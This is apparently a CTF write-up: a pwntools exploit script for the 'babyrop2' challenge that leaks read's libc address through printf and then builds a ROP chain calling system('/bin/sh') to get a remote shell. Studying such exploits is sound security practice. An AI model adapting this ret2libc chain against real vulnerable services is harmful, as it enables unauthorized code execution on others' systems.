一道常规的题目：先用 printf 泄漏 libc 中 read 的地址，再构造 ROP 链调用 system("/bin/sh")。
exp:
from pwn import *
from LibcSearcher import *
# --- target selection --------------------------------------------------------
# `select` chooses the target: 0 runs the binary locally, anything else talks
# to the remote CTF instance.  `local_libc` / `remote_libc` are kept for
# reference only; libc offsets are resolved later from the leak.
local_file = './babyrop2'
local_libc = './libc.so.6'
remote_libc = './libc.so.6'
select = 1
r = process(local_file) if select == 0 else remote('node3.buuoj.cn', 26691)
# Alternative to LibcSearcher: pin the libc build with ELF(local_libc) /
# ELF(remote_libc) and read the offsets from it.

# The ELF is loaded for its GOT/PLT/symbol addresses.  'debug' log level
# dumps every byte sent and received, which is what you want while building
# the chain; arch is taken from the ELF so flat()/u64() pack correctly.
elf = ELF(local_file)
context.update(arch=elf.arch, log_level='debug')
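# Thin wrappers around the tube `r` so the exploit body reads compactly.
# `sa` and `sea` are the same operation; both names are kept so the rest of
# the script keeps working.
se = lambda data: r.send(data)
sa = lambda delim, data: r.sendafter(delim, data)
sl = lambda data: r.sendline(data)
sla = lambda delim, data: r.sendlineafter(delim, data)
sea = lambda delim, data: r.sendafter(delim, data)
rc = lambda numb=4096: r.recv(numb)
rl = lambda: r.recvline()
ru = lambda delims, drop=True: r.recvuntil(delims, drop)
# Unpack a partial little-endian leak (e.g. the 6 meaningful bytes of a
# 64-bit userspace pointer) by zero-padding on the right.  The fill is a
# bytes literal so this works with both Python 2 and Python 3 pwntools:
# on Python 3 recv() returns bytes and bytes.ljust() rejects a str fill.
uu32 = lambda data: u32(data.ljust(4, b'\0'))
uu64 = lambda data: u64(data.ljust(8, b'\0'))
# Log an address in hex through the tube's own logger.
info_addr = lambda tag, addr: r.info(tag + ': {:#x}'.format(addr))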
def debug(cmd=''):
    """Attach gdb to the live target, feeding `cmd` as the initial gdb script.

    Presumably only useful when `r` is the local process target; against the
    remote instance there is no local process to attach to.
    """
    target = r
    gdb.attach(target, cmd)
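# --- ROP chain ---------------------------------------------------------------
# Gadget and data addresses sit around 0x400000, i.e. the binary is presumably
# non-PIE, so they are fixed across runs.
pop_rdi = 0x0000000000400733  # pop rdi ; ret
pop_rsi = 0x0000000000400731  # pop rsi ; pop r15 ; ret  (needs a dummy qword for r15)
s = 0x400790                  # address passed as printf's format string (contents not shown here; presumably a "%s"-style string)
read_got = elf.got['read']
print_plt = elf.plt['printf']
main = elf.sym['main']

# Stage 1: overflow the name buffer (0x20 bytes of data plus 8 bytes that
# presumably cover the saved rbp), then printf(s, read@got) prints read's
# libc address, and returning into main gives us a second overflow.
# Padding and delimiters are bytes literals so flat()/sendlineafter() behave
# the same on Python 2 and Python 3 pwntools.
p1 = flat([b'a' * 0x20, b'b' * 0x8,
           pop_rdi, s,
           pop_rsi, read_got, 0,   # rsi = read@got, r15 = junk
           print_plt,
           main])
sla(b'name? ', p1)

# The pointer is printed raw.  Read up to (and including) the 0x7f top byte
# of a userspace libc address, keep the last 6 bytes and zero-extend to 8.
# CAVEAT: this assumes the leaked pointer is the first 0x7f byte in the
# output; if the prompt or format string ever contains one, the leak is wrong.
leak = r.recvuntil(b'\x7f')[-6:]
read_addr = u64(leak.ljust(8, b'\x00'))
info_addr('read', read_addr)

# Resolve offsets from the leak.  LibcSearcher may match several libc builds
# for the same low 12 bits; if the final chain segfaults, pin the build
# (e.g. ELF('./libc.so.6')) instead of relying on the database match.
libc = LibcSearcher('read', read_addr)
libcbase = read_addr - libc.dump('read')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
info_addr('libc base', libcbase)
info_addr('system', system_addr)

# Stage 2: system("/bin/sh").  0xdeadbeef is only the return address after
# system() and is never reached while the shell is alive.  If system() dies
# on a movaps (rsp not 16-byte aligned, common with glibc >= 2.27), insert a
# lone `ret` gadget before pop_rdi to realign the stack.
p2 = flat([b'a' * 0x20, b'b' * 8, pop_rdi, binsh_addr, system_addr, 0xdeadbeef])
sla(b'name? ', p2)
r.interactive()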